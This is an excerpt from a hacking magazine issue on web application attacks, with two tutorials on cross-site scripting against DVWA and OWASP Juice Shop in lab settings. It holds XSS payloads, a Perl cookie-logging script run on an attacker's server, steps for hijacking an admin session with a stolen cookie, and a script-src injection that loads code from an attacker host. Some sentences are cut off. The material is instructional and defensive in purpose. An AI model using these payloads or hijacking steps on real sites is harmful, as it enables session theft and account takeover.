Web Application Attacks
Editor-in-Chief
Joanna Kretowicz
Proofreaders
Lee McKenzie
Editors:
Hammad Arshed
Marta Sienicka
Olivier Caleff
www.hakin9.org
cybersecurity. First, it was the 16th year of spreading cyber security awareness among
institutions, governments, and people in general. We also celebrated the Internet’s 50th
birthday! That’s a big milestone! Did you know that the first message sent contained only
two letters? They were “lo” (it was supposed to be “login”, but the system only processed the first
two letters) and the system crashed during the sending process :) But in the end everything
worked out perfectly. And thanks to that, today we can present you yet another edition of
Hakin9!
We decided to focus on one of the most popular topics, Web Application Attacks. We
have a few really amazing articles that will show you a completely different perspective on
this area and hopefully let you understand how specific attacks are performed.
We start with an article presenting one of the most well known attacks, Cross Site
achievements and experience. You can find his articles in many of our editions and each
presents the highest quality possible. This time Washington focused on cross site scripting
attacks and same origin policy. To put his idea in practice, he prepared a lab for your
studies. The article is worth reading through, to later on test its findings in your own lab.
Now that we know a lot more about XSS, we go to the next publication. Helping
customers understand the risks of Cross-Site Scripting attacks through a demo is an article
written by our avid reader, Eduardo Parra San Jose. We will approach XSS attacks from a
findings to customers or the developer team. How to do it? With Eduardo’s help you will
get a great demo which is both understandable and effective. It’s a must-read for all
Looking for a more hands-on experience? Hamdi Sevben shared with us his examples of
web application attacks. In this article the focus is on using the Burp Suite (among other
tools) to perform such attacks on a platform created purely to test your skills. With
Hamdi’s help you will level up your web app attack skills in no time.
Knowing how XSS works and what tools are best to use for a web app attack, next we will
read about XML External Entities by Angelo Anatrella. This attack exploits a weakness in
the user's input processing phase, when the web application accepts an XML document
as input. But that’s not all, while reading the article you will analyze the two following
But we are only halfway through the magazine! There are still plenty of articles we have
for you. Another one was prepared by Hubert Demercado and Elzer Pineda. In their case
scenario you will see how they used a technique they came up with that allowed them to
increase the probability of success on obtaining a remote shell. Their goal was to totally
compromise the server by placing obfuscated code that allows bypassing antivirus
detection.
If you prefer different topics, we have something for you as well. In Hardware Hacking,
Felipe Hifram, Deivison Franco and Leandro Trindade present an
experiment in which they show how to break or modify existing hardware, using various
examples. We don’t want to spoil the fun, because it’s an extremely engaging read.
Ever heard about Wardriving? We have something more than a simple tutorial about it for
you. Paul Mellen, our amazing reviewer and author, prepared a massive guide about this
technique. All his materials are based on the latest software and hardware, so everything
is up to date. Trust me, you will enjoy this article, and we heard rumors a second
part is coming!
There is also an article about OSINT techniques: “How exposed are we on the
System and its flaws, we will once again focus on IoT and its connections to
automotive industry.
It’s a very long edition, but we hope that those tutorials will brighten your
Web Application Attacks – Cross Site Scripting (XSS)
Washington Almeida
ABOUT THE AUTHOR
Washington Almeida
Washington Almeida is an Electronic Engineer and a Specialist in Law and Information Technology from the
USP Polytechnic School, with an extension course in business development from Fundação Dom Cabral. He is a member of the
United States High Technology Crime Investigation Association and the Italian International Forensic
Association of Information Systems. He is the author of articles for the magazines of the Brazilian Intellectual
Property Association (ABPI) and for the international Hakin9, Pentest Magazine and eForensics, specializing in
information security, hacking and digital forensics, where he also contributes as an instructor. He holds the Microsoft
Excellence Title as MCSE. He has more than 25 years of experience and is familiar with digital forensic procedures
covering the investigation phases of collection, examination, analysis and reporting. His
technical background has been acquired through consistent support in cases involving social
media, instant messaging, droppers, ransomware, copyright infringement, e-mail systems, HR
systems, databases, data theft, bank fraud, computer hacking and Internet applications, among others. As a cyber
security professional he also performs sophisticated penetration testing, helping companies improve
the security of their assets. In assisting the courts, he is licensed by the “Tribunal de Justiça de São
Paulo” and the “Tribunal Regional do Trabalho da 2ª Região”, acting as an expert witness appointed by the judge.
Legal note:
Exploitation techniques are used by cyber security specialists to find and validate vulnerabilities in the information
technology environment while performing extensive security auditing activities. These experts use such techniques to
diagnose security problems and to detect vulnerabilities on the environments in which they are authorized to
experiment with exploitation tools.
However, experimenting with exploitation techniques on hosts, systems and network environments that do not belong
to you, and against which you are not authorized to use such techniques, constitutes illegal activity and is subject to law
enforcement that can vary from country to country.
This is the reason why all attack interactions are carried out within a controlled environment and isolated from the
internet, ensuring that knowledge is shared without incurring the crime of computer intrusion.
Abstract/Introduction:
Understanding the Cross-Site Scripting (XSS) attack class requires understanding how and why this vulnerability is
present on thousands of web pages around the globe.
When we talk about web page security, there is a concept known as the Same Origin Policy (SOP), which forbids a
web application from retrieving content from pages with another origin. By prohibiting access to cross-origin
content, it prevents random sites from reading or modifying data on your social network page or
financial transaction account, for example, while you are connected to them.
Same Origin Policy (SOP) is one of the most important and fundamental principles involved in the security of every
browser. It basically implies that two pages have the same origin if the protocol, port (if specified), and host are the
same for both pages. For better understanding, let's take as an example my website page
https://www.washingtonalmeida.com.br/index.html that can access the content of
https://www.washingtonalmeida.com.br/about.html while the https://xss-attacker.com/index.html page cannot
access the content from https://www.washingtonalmeida.com.br/about.html. It is easy to see in this example that the
origin is not the same for the pages.
One source is the domain www.washingtonalmeida.com.br while the other source is xss-attacker.com. Now let's take
the example of the page https://www.washingtonalmeida.com.br/index.html. Can this page access the page
http://www.washingtonalmeida.com.br/about.html? The answer is no because they are different protocols, the first
one uses the https protocol while the second one uses a different protocol: http. Now consider the page
https://www.washingtonalmeida.com.br:8181/index.html.
Can this page access https://www.washingtonalmeida.com.br/about.html since in this example they use the same
protocol (https)? The answer is no because the ports are now different: the first one uses port 8181 while the second
one uses the default port for https, which is 443.
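The three comparisons above can be reproduced with a few lines of JavaScript. This is only a minimal sketch of the rule, not the browser's actual implementation; the helper name sameOrigin is an assumption made for illustration, while the URL class is the standard one available in browsers and in Node.js.

```javascript
// Compare two URLs the way the Same Origin Policy does: scheme, host and port.
// sameOrigin is a hypothetical helper name used only for this illustration.
function sameOrigin(a, b) {
  const ua = new URL(a);
  const ub = new URL(b);
  // URL.port is "" when the scheme's default port is in use (443 for https, 80 for http).
  return ua.protocol === ub.protocol &&
         ua.hostname === ub.hostname &&
         ua.port === ub.port;
}

const base = "https://www.washingtonalmeida.com.br/index.html";

// Same scheme, host and port: same origin.
console.log(sameOrigin(base, "https://www.washingtonalmeida.com.br/about.html")); // true
// Different host.
console.log(sameOrigin(base, "https://xss-attacker.com/index.html")); // false
// Different scheme (https vs http).
console.log(sameOrigin(base, "http://www.washingtonalmeida.com.br/about.html")); // false
// Different port (8181 vs the https default).
console.log(sameOrigin("https://www.washingtonalmeida.com.br:8181/index.html",
                       "https://www.washingtonalmeida.com.br/about.html")); // false
```

Comparing the three components separately, rather than whole strings, makes it visible which part of the origin causes the mismatch.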
In order to have a better understanding of a Same Origin Policy, let us take another example of the following code
present at www.washingtonalmeida.com.br that uses an Ajax request in order to fetch contents of hakin9.org and
display it on www.washingtonalmeida.com.br.
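<script>
// Create the request object before using it
var x = new XMLHttpRequest();
x.open('GET','http://www.hakin9.org', true);
// The request is asynchronous, so read the response only once it has loaded
x.onload = function () { document.write(x.responseText); };
x.send();
</script>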
When the JavaScript is executed on www.washingtonalmeida.com.br, the SOP prevents it from reading the contents
present at http://www.hakin9.org because both the scheme and the host differ.
A SOP bypass occurs when JavaScript present on one origin say https://www.washingtonalmeida.com.br is able to
access properties of webpage on another origin https://www.hakin9.org such as cookies, location, http response, etc.
Note that this technique is a way of ignoring the concept of SOP in a vulnerable web application. The reader should
have realized that if cookies, which typically contain session identifier information, can be read by the client's
JavaScript code, the attacker could use them in their own browser and log in to the web application as a victim, and for
this reason Cross-site Scripting is regarded as one of the most dangerous attack classes today.
Now that a basic introduction to the principles of SOP has been given, let's see how XSS works in practice.
This is one of the most commonly used diagrams by security experts to give insight into how a cross-site scripting class
attack occurs.
3. The infected page injects the script into the victim's browser;
Given the introduction, let's see in practice how the attack happens.
The idea of presenting the lab is purely motivational, as any web security student can build their own lab and try to
repeat the content presented in this article. The learning comes from persistent application of the techniques and
continuous and dedicated study time to understand the mechanisms involved in each class of attack.
Equipped with Microsoft Internet Information Services web server and assigned IP address 192.168.1.7.
The Wash machine, the attacker machine, runs Kali Linux, an advanced Linux
distribution used for penetration testing, ethical hacking and network security assessments. It is assigned the IP
address 192.168.1.18 and runs an Apache web server.
The vulnerable web server is the famous DVWA. DVWA stands for Damn Vulnerable Web Application, which is a
PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test
their skills and tools in a legal environment. The vulnerable web server is assigned the IP address 192.168.1.42.
The simple design of the Wash lab is shown in the figure below.
Scenario:
The web server administrator (192.168.1.7) has logged on to the server (192.168.1.42) and the hacker (192.168.1.18)
knows that this web server is vulnerable to the XSS attack class.
In the Admin authentication process, an authentication token is generated, and we want to investigate which active
user session that token relates to.
Cross-site Scripting is extremely dangerous because if a site is vulnerable to it, it is literally possible to steal this active
session by using the authentication cookie (token). Let's look at the steps of the attack.
In the reflected method of XSS, there is usually a field where the visitor can interact with the site, as shown in the
following figure.
The field prompts the visitor to enter their name, but what prevents them from using this field for other interactions?
OK, everyone, let's first enter my name in the field and check how the web server responds.
As a result, we found that a statement with my name is displayed in red color just below the field where I entered my
name.
OK, so far we see the expected operation for the purpose of the field, and the code should allow no more than that.
Now let's try to echo a popup with another data entry in this field. The code I will enter will be exactly this:
<script>alert('XSS-Reflected')</script>
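Why such input ends up being executed can be sketched with a small example. The rendering functions below are hypothetical and are not DVWA's actual code; they only assume that the page builds its greeting by concatenating the submitted name into HTML, first as-is and then with the HTML special characters encoded.

```javascript
// Hypothetical rendering of the name field (an assumption, not DVWA's real source).
function renderGreetingUnsafe(name) {
  // The input is copied into the page verbatim, so any markup in it becomes part of the page.
  return "<pre>Hello " + name + "</pre>";
}

// Encode the characters that have a special meaning in HTML.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderGreetingEscaped(name) {
  // The same greeting, but the input is treated as text rather than as markup.
  return "<pre>Hello " + escapeHtml(name) + "</pre>";
}

const payload = "<script>alert('XSS-Reflected')</script>";
console.log(renderGreetingUnsafe(payload));  // the script tag survives and would run in a browser
console.log(renderGreetingEscaped(payload)); // the script tag is displayed as plain text
```

In the first case the browser receives a real script element, which is exactly the behaviour exploited in this lab; in the second it receives harmless text.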
At this point, it is easy to see that the attacker can insert JavaScript code that runs in the site's
context. By doing so, the attacker can access other pages on the same domain and read data such as CSRF tokens or
the cookies that have been set. In both cases, the attacker will be able to steal the active session of whichever user suits him and, of
course, what best meets the hacker's expectations is the root or admin account.
In the case of cookies, which typically contain session identifier information, they can be read by client-side
JavaScript code, and the attacker can use them in his own browser to log in to the web application as the victim. If
that does not work, the attacker can still read private information from the pages, such as CSRF tokens, and
make requests on behalf of the user.
Let's inject another piece of code into the vulnerable page, this time plain HTML markup:
<marquee><h1>Washington Almeida</h1></marquee>
And the result shown in the following figure is displayed after clicking the "Submit" button.
Note that the injected code is reflected in the vulnerable page, hence the name Reflected Cross-Site Scripting.
Now let's try with another script to get relevant information to perform an attack. The code we will inject is the one
shown in the line below.
<script>alert(document.cookie)</script>
And as a result, I received the following pop-up on my screen, the attacker's screen.
On a vulnerable web site that sets many session cookies, the list of cookies would be long. The value that follows the
PHPSESSID name is the ID of the active session on the website.
Going back to the design of my personal network, remember that on my Kali Linux station I have an Apache server
running and this server is maliciously configured to allow writes to a folder named /var/www/logdir.
My Kali Linux machine has the IP 192.168.1.18 and the next step is to download the active session cookie I found in
order to use all of Kali's arsenal and check if this cookie is from an interesting active session or not.
So, let's build a slightly better script that allows me to transfer a copy of the active session cookie to my Kali Linux
machine whose IP is 192.168.1.18. The script code will be exactly the following line:
When we enter this code in the field and submit it by clicking the "Submit" button, we get the following information as
return of the script execution shown in the figure below:
Note that the script made the browser request a resource from a different origin, and the response comes from the
attacker's computer, confirming that the session cookie was successfully copied at this stage of the attack. If you
look at the code typed into the field, you will see that it requests a resource at another origin, the
IP address 192.168.1.18, precisely the IP of the attacker.
This means that from this moment on the hacker has at his disposal information about the session being used by
another user, and he wants to know as quickly as possible which user is the "owner" of this authenticated
session, so that he, the attacker, can impersonate that user by presenting the stolen authentication cookie. At this
point it should be clear to the reader that, although the cookie was obtained through XSS rather than by intercepting traffic, the attacker ends up in a position similar to that of a Man-in-the-Middle attacker.
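Note that this transfer of information between sites circumvents the principle we commented on at the
beginning of the article, the Same Origin Policy (SOP): because the injected script runs in the vulnerable site's own origin, the browser allows it to read that site's cookie and send it to another origin.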
The main actor involved in this process is the logit.pl script, which may vary according to each environment's
peculiarity. For the example shown in this article, the code executed in the Perl script is shown below:
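#!/usr/bin/perl
# Note: lines marked "assumed" were missing from the printed listing and are reconstructed.
chomp($DATE= `date`);
$dir= "/var/www/logdir";
$file= "$dir/log.txt";
print "Content-type: text/html\n\n";
open(LOG,">>$file");
&getDATA;
close(LOG);
sub getDATA {
    # Take the data from the query string, the request body or the command line
    if($ENV{'QUERY_STRING'} ne "") {
        $buffer = $ENV{'QUERY_STRING'};
    }
    elsif($ENV{'CONTENT_LENGTH'} ne "") {
        read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});   # assumed
    }
    else {
        chomp($buffer = $ARGV[0]);
    }
    print "----------------------------------<BR>\n";
    $HTTP_REFERER = $ENV{'HTTP_REFERER'};
    print LOG "$DATE $HTTP_REFERER\n";                   # assumed
    foreach $pair (split(/&/, $buffer)) {                # assumed
        ($name, $value) = split(/=/, $pair, 2);          # assumed
        $value =~ tr/+/ /;
        $FORM{$name} = $value;
        print LOG "$name = $value\n";                    # assumed
    }
    print "----------------------------------<BR>\n";
}
#END_OF_THE_SCRIPT_CODE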
Let us understand some parts of this script; the rest I leave as homework for the professionals who, I am sure,
will make a difference in this challenging market.
The command chomp($DATE= `date`); stores the output of the system's date command, without its trailing newline, in $DATE. The line that
sets the folder to which data is written, /var/www/logdir, is as follows:
$dir= "/var/www/logdir";
The name of the log file that will be written on the attacker's Apache web server,
log.txt, is set in this part of the code:
$file= "$dir/log.txt";
Together these give the folder and file name where the cookie information is stored. If you list the contents
of the log.txt file right after the capture, you will get the same information shown in figure 8.
The instruction print "Content-type: text/html\n\n"; will print HTML if tested from a browser.
The line open(LOG,">>$file"); opens the log file in append mode. In Perl, opening a file in
append mode means that new content is added to the end of the file's existing content.
The &getDATA statement calls the getDATA subroutine, which executes the instructions contained in the sub getDATA block.
Note that Perl statements end with a semicolon. The semicolon marks the end of a statement, and
statements are executed one after another in the order in which they appear.
Once the attacker has done what he should never have been able to do, i.e. made a copy of the victim's
session cookie, it is time to find out which user owns the session he intends to hijack.
Talking a little about cookies, they are generally used by web servers to keep state information on the client side. The
server sets cookies by sending a response header line that looks like Set-Cookie: <data>, where the data
part typically contains a set of NAME=VALUE pairs (separated by semicolons, like security=VALUE1;
PHPSESSID=VALUE2;). The server can also specify the path the cookie should be used for (by specifying
path=value), the domain to use it for (domain=NAME) and whether it should be used on secure connections only (secure).
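The structure just described can be illustrated with a short parser. This is a minimal sketch that follows the description above and is not a complete cookie parser; the function name parseCookieData and the sample string are assumptions, with VALUE1 and VALUE2 kept as placeholders exactly as in the text.

```javascript
// Split a cookie data string into NAME=VALUE pairs and bare attributes such as "secure".
// parseCookieData is a hypothetical helper written for this illustration.
function parseCookieData(data) {
  const pairs = {};
  const flags = [];
  for (const part of data.split(";")) {
    const item = part.trim();
    if (item === "") continue;            // tolerate a trailing semicolon
    const eq = item.indexOf("=");
    if (eq === -1) {
      flags.push(item.toLowerCase());     // attribute without a value, e.g. secure
    } else {
      pairs[item.slice(0, eq)] = item.slice(eq + 1);
    }
  }
  return { pairs, flags };
}

// Placeholder values, as in the text above.
const parsed = parseCookieData("security=VALUE1; PHPSESSID=VALUE2; path=/; secure");
console.log(parsed.pairs.PHPSESSID); // VALUE2
console.log(parsed.pairs.path);      // /
console.log(parsed.flags);           // [ 'secure' ]
```

Splitting on the first "=" only keeps values that themselves contain an equals sign intact.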
To make use of this information we use a combination of two commands. One is curl, a powerful command-line
tool for transferring data. The other is the egrep command.
First, we use the curl command to request the page with the captured cookie and save the response to a file, in this case I
want to use the HTML format.
When you use the curl command with the -b option, curl sends the cookie data you supply along with the request, and that is all that needs
to be done at this time. Before launching the curl command line, the attacker looks closely at the contents of the log.txt
file that he captured in the process, the contents of which are shown in figure 8. Figure 9 shows the complete
command line used to transfer the cookie session information from the host 192.168.1.42 to the attacker host
192.168.1.18.
Note that the output of the curl command is saved to an HTML file by placing the
redirection character ">" before the output file name.
And in Figure 10 we can prove the existence of the login.html file, which has the active session authentication cookie
information.
With the login.html file in hand, it is time to use the egrep command. Egrep is an acronym for "Extended Global Regular
Expressions Print"; it is a program that scans a specified file line by line, returning the lines that contain a
pattern matching a given regular expression. As extra information, running egrep in a Unix/Linux environment is
equivalent to running the grep command with the -E option.
In this context, if we wish to obtain user information, we include the expression "Username:". If we want to bring in
the security level information that is present in the file, we include the expression "Security Level:". If we want both
pieces of information, we separate the instructions with a pipe symbol "|", as shown in the figure below.
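The filtering that egrep performs here can be sketched in JavaScript. The page content below is hypothetical, since the real login.html is only shown as a figure; the function name grepLines is likewise an assumption. Only the two expressions and the pipe symbol come from the text.

```javascript
// Return the lines of `text` that match `pattern`, similar to `egrep pattern file`.
// grepLines is a hypothetical helper written for this illustration.
function grepLines(text, pattern) {
  const re = new RegExp(pattern);
  return text.split("\n").filter((line) => re.test(line));
}

// Hypothetical page content; the values shown are placeholders, not captured data.
const samplePage = [
  "<h1>Welcome</h1>",
  "<b>Username:</b> SOME_USER<br />",
  "<b>Security Level:</b> SOME_LEVEL<br />",
  "<p>Other content</p>",
].join("\n");

// The pipe symbol means "either expression", exactly as in the egrep command line.
const hits = grepLines(samplePage, "Username:|Security Level:");
console.log(hits);
```

Only the two lines containing one of the expressions are returned; every other line of the page is discarded.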
We are now at the session hijacking stage, but to hijack the admin session we need to change the HTTP header to enter
PHPSESSID information and Security Level information. This task is accomplished through an extension known as
Tamper (Tamper data, Tamper Chrome, etc.). So, we need to start the Tamper extension from the Firefox menu,
Iceweasel in the case of my Kali Linux machine. See the figure below:
After starting the Tamper extension, it will interrupt the page load by asking the attacker if he wants to change the
header information.
By clicking the tamper button, a dialog screen opens allowing the attacker to manipulate the header information,
replacing all or part of the data. In our case, we want to change the PHPSESSID and Security Level information.
This previously captured information is overwritten in Tamper's dialog box, allowing the landing page session to open
with different information than would normally be used by visitors.
Then, while downgrading security, the attacker populates the value of the PHPSESSID parameter with the Admin user
session information and clicks OK to start the session hijacking.
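What the attacker does by hand in the Tamper dialog amounts to rewriting the Cookie request header. The sketch below assumes that both values travel as cookies named security and PHPSESSID, as in the cookie example earlier in the article; the function name overrideCookies and all values are placeholders chosen for illustration.

```javascript
// Replace selected cookies inside a Cookie request-header value.
// overrideCookies is a hypothetical helper; it is not part of any Tamper extension.
function overrideCookies(cookieHeader, overrides) {
  const cookies = new Map();
  for (const part of cookieHeader.split(";")) {
    const item = part.trim();
    const eq = item.indexOf("=");
    if (item === "" || eq === -1) continue;   // skip empty or malformed parts
    cookies.set(item.slice(0, eq), item.slice(eq + 1));
  }
  // Overwrite existing cookies or add new ones, keeping the original order.
  for (const [name, value] of Object.entries(overrides)) {
    cookies.set(name, value);
  }
  return [...cookies].map(([name, value]) => `${name}=${value}`).join("; ");
}

// Placeholder values: the attacker's own header and the values captured earlier.
const ownHeader = "security=OWN_LEVEL; PHPSESSID=OWN_SESSION";
const tampered = overrideCookies(ownHeader, {
  security: "LOWER_LEVEL",
  PHPSESSID: "CAPTURED_SESSION",
});
console.log(tampered); // security=LOWER_LEVEL; PHPSESSID=CAPTURED_SESSION
```

The server sees only the final header, so it has no way to tell that the session identifier was issued to someone else.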
The page loads normally, however, with the admin user session, as we see in the picture below:
Cross-Site Scripting attacks are essentially code injection attacks into the various interpreters in the browser. These
attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash, and other client-side languages, with
objectives such as account hijacking, changing user settings and cookie theft or poisoning, among others.
It is not that easy to protect against XSS attacks because there are a number of factors to be considered for protection.
The main problem is that we have to deal with a wide variety of inputs and their valid strings. In this article, we saw
only two in a very didactic format to give the reader visibility and understanding of the problem. We can bypass most
XSS filters by encoding our XSS with different character sets, different character representations and even with media
file types such as JPEG, MP3, MOV, etc. Remember that media files can hide XSS payloads.
Periodically review your company's information security policies. Before, the concern was the network; today we are
concerned about the cloud and IoT devices, among others. Is the company's security policy keeping up with this
rapid evolution?
Simulate intrusion tests to assess potential vulnerabilities that may expose the company assets to the risk of
cyber-attacks.
Keep practicing and learning new techniques. If you run out of things to learn, go back to Exploits Database by
Offensive Security and look at the latest exploits. You will end up finding new hacking techniques that you can
incorporate into your growing tool kit.
Summary:
One of the most fundamental defenses against exploitation techniques and the tools used to compromise systems is
the ability to protect the corporations’ assets against these threats.
The patches, also known as fixes, are intended to remedy these vulnerabilities as soon as they are revealed and are
often distributed in software updates. Hence, it is vital to keep your software up to date to make sure that all known
vulnerabilities are patched.
If the company implements a poor-quality web application development policy, resources could be compromised and
data exposed to the Internet. Companies are responsible for developing secure web solutions, and the
professionals who provide services to them are responsible for implementing these security features.
In times of the complex landscape of data breach laws, such as EU’s GDPR, Canada’s PIPEDA and Brazil’s General
Data Protection Law, if the compromised user session has elevated privileges within the application, as we could see in
this article, then the impact will generally be critical, allowing the attacker to take full control of the vulnerable
application and compromise all users and consequently their data.
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Eduardo Parra San Jose
ABOUT THE AUTHOR
cybersecurity specialization.
Introduction
Communication is key to raise the awareness of our customers and help them understand why it’s important to fix the
vulnerabilities present in their assets.
What I have noticed so far when reporting web vulnerabilities is that customers don’t take the reports
seriously enough. Most of the time, I am the one to blame because I wasn’t showing the customer or the customer’s
developer team any real examples on how an attacker can take advantage of the vulnerability to compromise the
confidentiality, integrity and/or availability of their assets. In the case of cross-site scripting, the attack targets their
most important asset, their clients. Raising awareness and helping a customer understand what risks are associated
with a vulnerability, I believe, are the best cards we have to play when it comes to preventing web application attacks.
So in this article, instead of showing just an alert box as a proof of concept and then a bunch of text describing the
impact of cross-site scripting attacks, I would like to share a demo that has helped me to better communicate the
impact of cross-site scripting attacks to our customers and their developer teams.
The idea is to start by making a brief, informal high-level introduction to cross-site scripting attacks and then code
some easy, reproducible example that I hope will help show your customers why it is important to fix the findings in
the reports we deliver to them.
A cross-site scripting attack, also known as XSS attack, happens when someone is able to take advantage of a
vulnerability in a web application to run JavaScript code in the victim’s web browser.
Cross-site scripting attacks should be taken into account because, as web browsers do not apply the Least Privilege
Principle and grant all the scripts in a site the same level of privileges, no matter where the script comes from or who
put it there, the attacker’s JavaScript code will get the same privileges as the legitimate scripts in the web site.
JavaScript code allows control of anything a web browser can do, such as change the visual aspect of a site, modify the
URL, add and delete entries in the web browser’s history, perform actions on behalf of an authenticated user or
download and execute malicious JavaScript code from any other web server.
• Stored
It happens when the vulnerability allows the attacker to store the JavaScript code in the web application
database. This is the worst scenario as the attack will target all the users who visit the affected part of the web
site. For example, think of an online store, if the vulnerability is found in a product’s comment field, the attack
will target all the users that visit the product page.
• Reflected
It happens when the vulnerability allows the attacker to execute JavaScript code included in an HTTP Request.
The JavaScript code can be inserted in an HTTP header, query string parameter or body parameter. For
example, think again of an online store that has a vulnerable search form; if instead of searching for a product,
a user inserts JavaScript code as a search term, and the search term is displayed on the screen after the search
is done, the JavaScript code that was injected as a search term will be executed.
• DOM-Based
It happens when there is a vulnerability in the web site’s JavaScript code that allows the attacker to manipulate
it and execute its own JavaScript code. It can be either reflected or stored. The vulnerability that leads to
DOM-XSS attacks is not in the server-side code that handles the HTTP request, but in the client-side code of
the web application. For example, think of a documentation section of a web application or an online book;
there could be an index that once it is clicked it takes us to a specific part of the documentation without
refreshing the page or making any HTTP request. In some of these cases, when the section name appears in the
URL after a hash symbol, what the application usually does is retrieve the content after the hash symbol:
https://anawesome.book/#chapter1
In this example, chapter 1 takes us to that part of the page. If we change the content after the hash for some
JavaScript code:
https://anawesome.book/#<script>console.log("notexpected")</script>
it could result in the execution of the JavaScript code if no validation is in place.
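The kind of validation mentioned in the DOM-Based case can be sketched as follows. This is only an illustration under stated assumptions: the function name sectionFromUrl and the rule that a section name consists of letters, digits, hyphens and underscores are hypothetical choices, not something the example site is known to use.

```javascript
// Read the section name that follows "#" and accept only simple identifiers.
// sectionFromUrl is a hypothetical helper written for this illustration.
function sectionFromUrl(url) {
  const hash = new URL(url).hash;   // e.g. "#chapter1"; special characters may be percent-encoded
  let section;
  try {
    section = decodeURIComponent(hash.slice(1));
  } catch (e) {
    return null;                    // malformed percent-encoding
  }
  // Allowlist: anything that is not a plain identifier is rejected.
  return /^[A-Za-z0-9_-]+$/.test(section) ? section : null;
}

console.log(sectionFromUrl("https://anawesome.book/#chapter1")); // chapter1
console.log(sectionFromUrl('https://anawesome.book/#<script>console.log("notexpected")</script>')); // null
```

Checking the fragment against an allowlist before using it means the injected markup never reaches the code that updates the page.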
At the end of this article, I will leave you some reference tutorials that I found good, which can help you not only dig
deeper into cross-site scripting attacks but also try them out in a lab environment.
To perform the demo, let’s first set up the environment. As a vulnerable web application, we will deploy the OWASP
Juice Shop version 7.5 to Heroku and for the attacker’s web server we will use Codeanywhere. I have chosen these
resources because both services are great for learning and do not require a credit card in the sign up process. Let’s
start deploying the OWASP Juice Shop to Heroku.
Heroku
https://www.heroku.com/
Next, we fill in the form and press the CREATE FREE ACCOUNT button:
After clicking the button, the following screen will indicate that we must confirm our email address:
To activate the Heroku account, we click on the link received in the confirmation email:
Next, we set up a password and then press the SET PASSWORD AND LOGIN button:
Finally, we click the CLICK HERE TO PROCEED button to log into Heroku:
https://github.com/bkimminich/juice-shop/tree/276cb9773a70a3fa471c43be66c4de4c21024c13
To deploy the OWASP Juice Shop to Heroku, we scroll down until the Deploy to Heroku button shows up and then we click on it:
After clicking the button, it will take us to Heroku. Then we have to press the Deploy app button:
If at any time we want to stop the application, we can press the Manage App button:
and then click on Settings:
For now, we leave the Maintenance mode off, so we can use the OWASP Juice Shop.
Codeanywhere
Now that we have our OWASP Juice Shop up and running, let’s go to Codeanywhere:
https://codeanywhere.com/
Next press the Try Now button of the Free Trial plan:
In the form, we enter an email and a password and then click on the Register button:
After clicking the button, the following screen will indicate that we must confirm our email address:
In this case, the email was in the Junk folder. Once I found it, I selected the link text, right clicked on it and then
clicked on the option to follow it (you can also copy the link and paste it in a new tab):
Now your account is verified and you can click on the ‘Click here’ link to access the editor:
A Connection Wizard will pop up. From all the available stacks, we choose PHP on Ubuntu 16.04. Then give our
environment a name and finally click on the CREATE link:
Once it is deployed, if we scroll down a little, we will see the link of our application’s domain and if we click on it:
To check that everything works as expected, let’s right click on the environment name under connections and select
Create File from the menu:
The code just prints It works! to the screen. Save the file either by pressing Ctrl+S or going to the File menu, and then
access the file from the web server:
Now that we have the environment up and running, let’s do the demo. In this demo we are going to show how to take
advantage of a vulnerability in the client-side JavaScript code to perform a cross-site scripting attack. In this attack:
• The code in the script will modify the visual aspect of the current page
• The script that contains the code will be downloaded from an external web server, the web server in
Codeanywhere
One of the first tasks to perform when auditing a web application is to crawl or spider the web site to find the linked
files and directories of the web application. This action can help discover interesting spots for further testing such as
web forms.
In this case, we can find a search form in the navigation bar at the top of the page:
We can also see in the URL that the search path is after a hash sign:
The part starting at the hash sign is known as the fragment of the URL and it is a part that is usually handled by
client-side JavaScript code. To better understand how the search form works, let’s press F12 to open the browser’s
developer tools and click on the Network tab:
Then let’s type a search term in the box, such as apple, and click the Search button:
After clicking the button, we notice that the web page is not refreshed. Instead, the Network tab shows that an HTTP request has been performed using JavaScript code:
Another interesting detail is that, even though the web page is not refreshed, the search term (apple) is displayed next to the words Search Results on the screen:
Therefore, there is client-side JavaScript code modifying the contents of the page. If we click on the request, we can see its URL:
And if we open the URL in a new tab, we will be able to see that the request returns data in JSON format:
This data is requested or retrieved using client-side JavaScript code and, as the page is not refreshed, we know that the
data is processed using client-side JavaScript code. So, if there is a vulnerability that leads to a cross-site scripting
attack, the type of the XSS will be DOM-Based.
There are multiple ways to insert JavaScript code into a website, but probably one of the best known is to use the script tags of the HTML language. Let’s try to insert a simple alert box, which most people use for testing. We type the code into the search form and then press the Search button:
And as we see, the JavaScript code gets executed triggering an alert box:
which means that the developer is not only not filtering the input we sent, but also not escaping the characters such as
< or > before displaying the code to the screen. After clicking the OK button, we can see that the code we typed gets
embedded into the source of the page:
As you all probably know, the script tag of the HTML language does not only allow you to execute the JavaScript code
within the script tags, but also load a script from any other web server using the src attribute. To test it, let’s go to
Codeanywhere, right click on the container and select Create File from the menu:
Once the file is created, we can start coding. The first thing we are going to do is to isolate our JavaScript code to avoid
issues with the legitimate JavaScript code in the page. Let’s see an example. Open the web browser’s developer tools by
pressing the F12 key and then click on the Console tab. Here you can play with JavaScript code. Let’s declare a variable
named x and then try to declare another variable named x. As the variable x has already been declared, the second
time you try to declare it, the following error is triggered:
So, in our code, if we name a variable div, and in the legitimate code there is another variable called div, our code
won’t work as we cannot declare a variable that has already been declared. To avoid conflicts like this one, instead of
using global variables, which is a very bad practice, we will create a function that will be immediately invoked
containing all the variables. As JavaScript has function scope, the variables created inside the function will not conflict with the variables outside the function. To immediately invoke a function, you wrap the function in parentheses and then add another pair of parentheses to call it:
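As a minimal sketch of the pattern just described (the variable values are made up for illustration), the following shows that a name reused inside an immediately invoked function does not collide with the page's own variable:

```javascript
// Stand-in for a variable that the legitimate page already declared.
// Declaring "div" again with let or const in this same scope would be a SyntaxError.
const div = "owned by the legitimate page";

// Everything inside the function is local to it, so reusing the name
// "div" here does not touch the page's variable.
const result = (function () {
  const div = "owned by the injected script";
  return div;
})();

console.log(div);    // the page's value is unchanged
console.log(result); // the value produced inside the function
```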
Save the file. Then go to OWASP Juice Shop and in the search form, use the HTML script tags with the src attribute to
load our script like this:
<script src="https://<codeanywhere.domain>/<scriptName>"></script>
In my case, it is:
